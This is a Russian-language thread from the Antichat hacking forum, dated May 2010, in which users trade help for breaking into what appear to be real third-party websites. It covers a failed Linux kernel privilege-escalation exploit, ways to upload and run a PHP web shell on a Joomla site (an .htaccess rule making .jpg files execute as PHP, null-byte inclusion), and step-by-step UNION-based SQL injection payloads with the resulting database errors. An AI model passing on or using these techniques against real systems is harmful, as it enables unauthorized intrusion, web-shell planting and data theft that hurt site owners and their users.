Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.05.2010, 22:08
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме: 1343031
Репутация:
184
|
|
Сообщение от daniel_1024
есть сервер Linux 2.6.18-028stab057.4 #1 SMP Fri Aug 1 10:47:59 MSD 2008 i686 GNU/Linux
при запуске эксплойта http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz пишется ошибка:
ядро пропатчено?!
Проверь: сайт судя по айпи хостится на mediatemple.com? Если да, то мне их openvz ядра пробить ничем не удалось.
|
|
|

09.05.2010, 23:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме: 835386
Репутация:
1463
|
|
Сообщение от Gorev
Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?
- пробовать расширения .phtml, .php3 и т.д.
- мешает .htaccess, определить какой, если в images удалить, если в корне, в images залить свой, в нем разрешить выполнение с нужным расширеним, по типу
AddType application/x-httpd-php .php .phtml .jpg
|
|
|

09.05.2010, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от nikp
- пробовать расширения .phtml, .php3 и т.д.
- мешает .htaccess, определить какой, если в images удалить, если в корне, в images залить свой, в нем разрешить выполнение с нужным расширеним, по типу
AddType application/x-httpd-php .php .phtml .jpg
php3,php5,phtml,shtml,html,htm не канают...был бы доступ к .htaccess , вопросов бы небыло
|
|
|

10.05.2010, 00:06
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Сообщение от Gorev
Добрый вечер всем.cms джумла, папка на запись только images, joomla_xplorer не установить как и другой модуль, шаблоны не правятся, в пaпке с картинками залитый шелл выдается иcxодным кодом.... как залить шелл?
Языки тоже не правятся? Хотя скорее всего да, иначе ты бы не написал бы пост...
В джамуле некоторые пути до пхп файлов (которые инклудятся двигом), а точнее до дир лежат в бд. И возможно тебе удастся проинклудить шелл, который сам по себе не выполняется. Запросы к бд выполняй через восстановление БД (запихиваешь нужный запрос в файл, к примеру 1.sql). В путях, скорее всего, имени пхп файла не будет и скорее всего везде будет инклудиться index.php, но тут должен помочь %00 (mq = on не помешает, т.к. запрос будет лежать в загружаемом файле).
Посмотри вот это: https://forum.antichat.ru/showpost.p...4&postcount=10 (там нечто похожее описывалось)
+ скачай двиг и потестируй все на локалке, иначе все убьешь в мгновение, да и после успешного выполнения двиг нормально работать не будет - нужно будет быстро перезалить шелл и все вернуть на место.
Последний раз редактировалось Grey; 10.05.2010 в 00:15..
|
|
|

10.05.2010, 15:35
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме: 436858
Репутация:
33
|
|
как правильно составить запрос?
SELECT * FROM mobiticket.structure_page WHERE tag = '53' AND status = 'active'
пробую так
page.php?page=53'+union+select+1,2,3,4,5,6,7,8,9,' 10
пишет
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '53' union select 1,2,3,4,5,6,7,8,9,'10' AND status = 'active' failed with error 1054: Unknown column 'status' in 'field list'
|
|
|

10.05.2010, 15:45
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме: 115871
Репутация:
16
|
|
53'+union+select+1,2,3,4,5,6,7,8,9,10--+
|
|
|

10.05.2010, 15:48
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме: 436858
Репутация:
33
|
|
Сообщение от Napas
53'+union+select+1,2,3,4,5,6,7,8,9,10--+
все равно пишет Unknown column 'status' in 'field list'
|
|
|

10.05.2010, 15:50
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Попробуй /* вместо --+
|
|
|

10.05.2010, 15:56
|
|
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме: 436858
Репутация:
33
|
|
Сообщение от wildshaman
Попробуй /* вместо --+
ошибка
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '53' union select 1,2,3,4,5,6,7,8,9,10/*' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND status = 'active'' at line 4
Последний раз редактировалось olishort; 10.05.2010 в 16:05..
|
|
|

10.05.2010, 15:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от olishort
ошибка
нуллбайт попробуй 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|